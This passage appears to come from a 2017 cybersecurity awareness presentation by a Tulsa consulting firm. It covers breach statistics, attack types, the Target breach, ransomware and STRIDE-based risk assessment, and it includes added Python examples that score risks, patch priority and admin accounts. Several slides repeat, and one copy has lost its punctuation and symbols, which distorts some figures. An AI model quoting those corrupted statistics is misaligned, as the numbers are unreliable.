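    "POS network":             dict(zip(STRIDE, (2, 4, 2, 4, 2, 3))),
}


def threat_impact(asset, threat):
    """Impact 1-5 of one threat on one asset; disclosing public data is minor."""
    if threat == "Information disclosure" and asset.classification == "public":
        return 1
    return asset.impact


def risk_register(assets, likelihoods=LIKELIHOOD_BY_LOCATION):
    """Step 5: one row per asset and threat, highest risk first.

    Rows are (risk, asset, threat, likelihood, impact); risk = L x I, 1-25.
    """
    rows = []
    for a in assets:
        for threat in STRIDE:
            like = likelihoods[a.location][threat]
            imp = threat_impact(a, threat)
            rows.append((like * imp, a.name, threat, like, imp))
    return sorted(rows, key=lambda r: (-r[0], r[1], r[2]))


def rating(risk):
    """Semi-qualitative band for a 1-25 score (assumed thresholds)."""
    return "High" if risk >= 15 else "Medium" if risk >= 8 else "Low"


def asset_priority(assets):
    """Assets ordered by their single worst threat: [(asset, max risk, band)]."""
    worst = {}
    for risk, name, *_ in risk_register(assets):
        worst[name] = max(worst.get(name, 0), risk)
    return sorted(((n, r, rating(r)) for n, r in worst.items()),
                  key=lambda t: -t[1])


# Steps 1-3 on a constructed inventory (names, values and scores made up).
ASSETS = [
    Asset("Customer card data", "POS network", "confidential", ("carders",), 5),
    Asset("Employee records", "internal database", "confidential",
          ("identity thieves", "insiders"), 4),
    Asset("Product catalog", "internet-facing web app", "public",
          ("competitors",), 2),
]

if __name__ == "__main__":
    for name, risk, band in asset_priority(ASSETS):
        print(f"{band:6} {risk:2}  {name}")
    for row in risk_register(ASSETS)[:5]:
        print(row)
```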
BASELINE GAP ANALYSIS
41
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
42
Patch Management – A patch management process is a company's strategy for ensuring that its IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices on their network and therefore are unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, a failure of least privilege can result in multiple individuals and IDs with access to, and/or knowledge of, higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
43
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
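The device and ID inventory steps above, turned into checks as an added example that is not code from the deck: a patch-priority worklist and least-privilege and password-parameter findings over a constructed inventory. The 30-day patch threshold, the scoring weights and the password baseline are assumptions.

```python
"""Added example (not code from the Stinnett deck): the 'Fixes' list turned
into checks over a constructed device and account inventory.

Assumptions not stated on the slides: a device is overdue when its last patch
is more than 30 days old; overdue internet-facing devices and the software
families the slide names rank higher; the password baseline is 12 characters,
3 character classes and a 90-day change interval.
"""
from dataclasses import dataclass
from datetime import date

TODAY = date(2017, 10, 27)                                # the deck's date, used as "now"
OVERDUE_AFTER_DAYS = 30                                   # assumption
HIGH_RISK_SOFTWARE = {"adobe", "java", "browser", "os"}   # families the slide names
PASSWORD_BASELINE = {"min_len": 12, "char_classes": 3, "max_age_days": 90}  # assumption


@dataclass
class Device:
    name: str
    internet_facing: bool
    software: set            # lower-case software family tags installed
    last_patched: date


@dataclass
class Account:
    user_id: str
    owner: str               # the person (or team) behind the ID
    system: str
    admin: bool
    justification: str = ""  # why this access level is necessary


def patch_priority(dev, today=TODAY):
    """Return (score, reason): 0 means current, higher means patch sooner.

    Overdue = 1 point, internet facing = +2, each known-vulnerable family = +1.
    """
    lag = (today - dev.last_patched).days
    if lag <= OVERDUE_AFTER_DAYS:
        return 0, "current"
    score, reasons = 1, [f"unpatched for {lag} days"]
    if dev.internet_facing:
        score += 2
        reasons.append("internet facing")
    risky = sorted(HIGH_RISK_SOFTWARE & dev.software)
    if risky:
        score += len(risky)
        reasons.append("known-vulnerable software: " + ", ".join(risky))
    return score, "; ".join(reasons)


def patch_worklist(devices, today=TODAY):
    """Overdue devices only, highest priority first: [(name, score, reason)]."""
    rows = [(d.name, *patch_priority(d, today)) for d in devices]
    return sorted((r for r in rows if r[1] > 0), key=lambda r: (-r[1], r[0]))


def account_findings(accounts, policies, baseline=PASSWORD_BASELINE):
    """Least-privilege and password-parameter findings: [(subject, finding)]."""
    findings = []
    admin_ids_by_owner = {}
    for a in accounts:
        if a.admin and not a.justification.strip():
            findings.append((a.user_id, "admin ID without documented business need"))
        if a.admin:
            admin_ids_by_owner.setdefault(a.owner, []).append(a.user_id)
    # One person behind several admin IDs: more paths to higher-level functions.
    for owner, ids in admin_ids_by_owner.items():
        if len(ids) > 1:
            findings.append((owner, "holds multiple admin IDs: " + ", ".join(sorted(ids))))
    for system, p in policies.items():   # observed parameters vs. baseline
        if p["min_len"] < baseline["min_len"]:
            findings.append((system, f"password length {p['min_len']} below {baseline['min_len']}"))
        if p["char_classes"] < baseline["char_classes"]:
            findings.append((system, f"only {p['char_classes']} character classes required"))
        if p["max_age_days"] > baseline["max_age_days"]:
            findings.append((system, f"change interval {p['max_age_days']} days exceeds {baseline['max_age_days']}"))
    return findings


# Constructed sample inventory (every name, date and parameter is made up).
DEVICES = [
    Device("web-01", True, {"os", "java"}, date(2017, 6, 1)),
    Device("file-02", False, {"os"}, date(2017, 10, 20)),
    Device("hr-pc-07", False, {"adobe", "browser", "os"}, date(2017, 7, 15)),
]
ACCOUNTS = [
    Account("jdoe", "J. Doe", "erp", True, "ERP administrator per role description"),
    Account("jdoe-adm", "J. Doe", "ad", True),
    Account("svc-backup", "IT", "ad", True, "Backup service account"),
    Account("asmith", "A. Smith", "erp", False),
]
POLICIES = {   # observed password parameters per system
    "ad":  {"min_len": 8,  "char_classes": 3, "max_age_days": 90},
    "erp": {"min_len": 12, "char_classes": 2, "max_age_days": 365},
}
```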
QUESTIONS
44
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates
8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number 918.728.3300
ContactUs@Stinnett-Associates.com
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems technology-dependent enterprises and
networks Cyber attacks can use malicious code weak passwords or other cyber exploits to gain
unlawful access to systems and data often resulting in disruptive consequences that can
compromise data and lead to cybercrimes such as information and identity theft
Cyber attacks often include the followingbull Identity theft fraud extortionbull Malware pharming phishing spamming spoofing spyware Trojans
and virusesbull Stolen hardware such as laptops or mobile devicesbull Denial-of-service and distributed denial-of-service attacksbull Breach of accessbull Password sniffingbull System infiltrationbull Website defacementbull Private and public Web browser exploitsbull Instant messaging abusebull Intellectual property (IP) theft or unauthorized access
17
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
18
Information Technology (IT) ndash The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The Hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition systems(SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
19
Bot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
20
Middleware ndash Software that facilitates exchange of data between two application programs within the same
environment or across different hardware and network environments Three basic types of middleware are (1)
communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place
themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for
themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious
code into a website In SQL Injection the attacker uses SQL language to obtain information back from the
website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of
website
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
21
Common Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these 5 attack patterns:
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63% of all breaches are attributable to the top 2 alone.
Common attack patterns account for a vast majority of documented breaches.
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems capturing customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and the use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
- Email attachment
- Cross-site scripting from a visited website
- Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through the use of malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third-party website used for submitting electronic invoices
• Injected code into a vulnerability in the electronic submission process to gain further access to Target's internal network
• Reconnoitered the environment and obtained domain administrator access
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location, working around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off)
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons companies struggle are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE / TECHNOLOGY / PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE threat modeling to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
- Credit card data
- Employee or customer records
- Bank accounts
- Intellectual property
- Trade secrets
- Insider knowledge
• Who would want the data?
• Data location
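As an added example that is not the firm's own methodology or tooling, the following carries the flow from the two slides above (assets, locations, classification, STRIDE threat modeling, calculated risk results) through in code; the scales, the score bands and the sample inventory are constructed assumptions, and the relocation helper shows how the same asset scores after network segmentation.

```python
"""Semi-quantitative STRIDE risk assessment over an asset inventory.

Added illustration of the flow on the slides (identify assets, record their
locations, classify them, model threats with STRIDE, calculate risk); it is
not the firm's own methodology or tooling. The scales, bands and the sample
inventory below are constructed for the example.
"""
from dataclasses import dataclass, field
from typing import Dict, List

STRIDE = ("Spoofing", "Tampering", "Repudiation", "Information disclosure",
          "Denial of service", "Elevation of privilege")

# Constructed scale: business value implied by the asset classification (1..5).
CLASSIFICATION_VALUE = {"public": 1, "internal": 2, "confidential": 4, "restricted": 5}

# Constructed scale: how reachable the asset's location is for an attacker (1..4).
LOCATION_EXPOSURE = {"segmented internal network": 1, "flat internal network": 2,
                     "third-party hosted": 3, "internet facing": 4}


@dataclass
class Asset:
    name: str
    location: str
    classification: str
    # Workshop judgement (1..5) of how likely each STRIDE threat is against this
    # asset; categories that are left out are treated as not applicable.
    threat_likelihood: Dict[str, int] = field(default_factory=dict)


@dataclass
class RiskResult:
    asset: str
    worst_threat: str
    score: int          # value x exposure x likelihood, so 0..100
    rating: str


def rating_for(score: int) -> str:
    """Constructed banding of the numeric score into the qualitative rating reported."""
    if score >= 50:
        return "high"
    if score >= 20:
        return "medium"
    return "low"


def score_asset(asset: Asset) -> RiskResult:
    """Risk of an asset is driven by its single worst STRIDE threat, not the sum."""
    value = CLASSIFICATION_VALUE[asset.classification]
    exposure = LOCATION_EXPOSURE[asset.location]
    worst_threat, worst = "none", 0
    for threat, likelihood in asset.threat_likelihood.items():
        if threat not in STRIDE or not 1 <= likelihood <= 5:
            raise ValueError(f"{asset.name}: bad STRIDE entry {threat!r}={likelihood!r}")
        score = value * exposure * likelihood
        if score > worst:
            worst_threat, worst = threat, score
    return RiskResult(asset.name, worst_threat, worst, rating_for(worst))


def assess(assets: List[Asset]) -> List[RiskResult]:
    """Calculated risk results, highest first, i.e. the prioritised list."""
    return sorted((score_asset(a) for a in assets), key=lambda r: r.score, reverse=True)


def relocated(asset: Asset, location: str) -> Asset:
    """The same asset after a change of location, e.g. after network segmentation."""
    return Asset(asset.name, location, asset.classification, dict(asset.threat_likelihood))


# Constructed inventory for the example.
INVENTORY = [
    Asset("Vendor e-invoicing portal", "internet facing", "confidential",
          {"Spoofing": 4, "Tampering": 3, "Elevation of privilege": 3}),
    Asset("Customer card database", "flat internal network", "restricted",
          {"Information disclosure": 5, "Tampering": 2}),
    Asset("HR employee records (SaaS)", "third-party hosted", "confidential",
          {"Information disclosure": 3, "Repudiation": 2}),
    Asset("Marketing website", "internet facing", "public",
          {"Tampering": 4, "Denial of service": 3}),
]

if __name__ == "__main__":
    for r in assess(INVENTORY):
        print(f"{r.rating:6} {r.score:3}  {r.asset}  (worst: {r.worst_threat})")
    moved = score_asset(relocated(INVENTORY[1], "segmented internal network"))
    print(f"after segmentation: {moved.rating} {moved.score}  {moved.asset}")
```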
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring that the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures, which shows in the following:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of Least Privilege is applied as much as possible. Within the IT department, the failure of Least Privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Oftentimes the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
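As an added example that is not the firm's own tool, the following turns the patch management failures and the first three fixes above into a scoring routine: every device in the inventory gets a patch-risk score, patches older than the slide's one-year line and the software families it names weigh more, internet-facing devices are doubled, and devices seen on the network but missing from the inventory are reported separately because they cannot be assessed at all. The weights, the assessment date and the inventory are constructed assumptions.

```python
"""Prioritise devices for patching from an IT asset inventory.

Added illustration of the fixes on the slides (inventory every device, assess
each device's patch risk, focus on internet-facing devices and the software
families called out as commonly vulnerable); it is not the firm's own tool.
The weights, the assessment date and the inventory below are constructed.
"""
from dataclasses import dataclass
from datetime import date
from typing import List, Optional, Set, Tuple

# The slide's statistic: 99% of exploited vulnerabilities were compromised more
# than a year after the patch was published, so a year is the staleness line.
STALE_AFTER_DAYS = 365

# Software families the slide singles out as having well-known vulnerabilities.
HIGH_RISK_FAMILIES = {"adobe", "java", "browser", "operating system"}


@dataclass(frozen=True)
class Installed:
    product: str
    family: str                       # one of HIGH_RISK_FAMILIES or "other"
    patch_released: Optional[date]    # newest vendor patch not yet applied; None if current


@dataclass(frozen=True)
class Device:
    name: str
    internet_facing: bool
    software: Tuple[Installed, ...]


def software_points(item: Installed, today: date) -> int:
    """Points for one missing patch: base 1, +2 for a high-risk family, +3 if stale."""
    if item.patch_released is None:
        return 0
    points = 1
    if item.family in HIGH_RISK_FAMILIES:
        points += 2
    if (today - item.patch_released).days > STALE_AFTER_DAYS:
        points += 3
    return points


def device_score(device: Device, today: date) -> int:
    """Sum of missing-patch points, doubled when the device is reachable from the internet."""
    total = sum(software_points(item, today) for item in device.software)
    return total * 2 if device.internet_facing else total


def prioritise(inventory: List[Device], today: date) -> List[Tuple[str, int]]:
    """(device, score) pairs, worst first: the order in which to patch."""
    scored = [(d.name, device_score(d, today)) for d in inventory]
    return sorted(scored, key=lambda pair: pair[1], reverse=True)


def unknown_devices(inventory: List[Device], seen_on_network: Set[str]) -> Set[str]:
    """Devices observed on the network that the inventory does not know about.

    These cannot be assessed at all, which is the second failure on the slide.
    """
    return seen_on_network - {d.name for d in inventory}


ASSESSMENT_DATE = date(2017, 10, 27)   # constructed: the presentation date

# Constructed inventory.
INVENTORY = [
    Device("web-portal-01", True, (
        Installed("Java 8 runtime", "java", date(2016, 7, 19)),
        Installed("Linux OS", "operating system", date(2017, 9, 5)),
    )),
    Device("finance-ws-12", False, (
        Installed("Adobe Reader", "adobe", date(2016, 5, 10)),
        Installed("Chrome", "browser", None),
    )),
    Device("print-server-02", False, (
        Installed("Print management", "other", date(2017, 10, 1)),
    )),
    Device("hr-laptop-07", False, (
        Installed("Windows", "operating system", None),
    )),
]

# Constructed: what a network scan actually found.
SEEN_ON_NETWORK = {"web-portal-01", "finance-ws-12", "print-server-02",
                   "hr-laptop-07", "camera-lobby-03"}

if __name__ == "__main__":
    for name, score in prioritise(INVENTORY, ASSESSMENT_DATE):
        print(f"{score:3}  {name}")
    print("not in inventory:", sorted(unknown_devices(INVENTORY, SEEN_ON_NETWORK)))
```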
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
FINANCIAL GAIN STILL #1 REASON
Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2015. Espionage and other factors combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers
• Ransomware payments estimated at over $1 billion in 2016
• 70% of all ransomware was paid
• 20% paid over $20,000
Source: Verizon Data Breach Investigations Report 2016
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII data
• Insider trading information
• Using a compromised environment for other attacks or for rent
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
The types of exploits used are changing.
Source: Verizon Data Breach Investigations Report 2016
CYBERSECURITY DEFINED
The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access.
Cybersecurity is usually considered a sub-set of Information Security, but can require the consideration of:
• Application security
• Operating system and network security
• Usage of specific intrusion detection and prevention software and tools
• User training and education
• Disaster recovery and business continuity considerations
• Really anything to help prevent, detect or recover from a cyberattack
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware, such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform distributed denial of service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service (DDoS) – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack in which the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while remaining unknown to the other two parties.
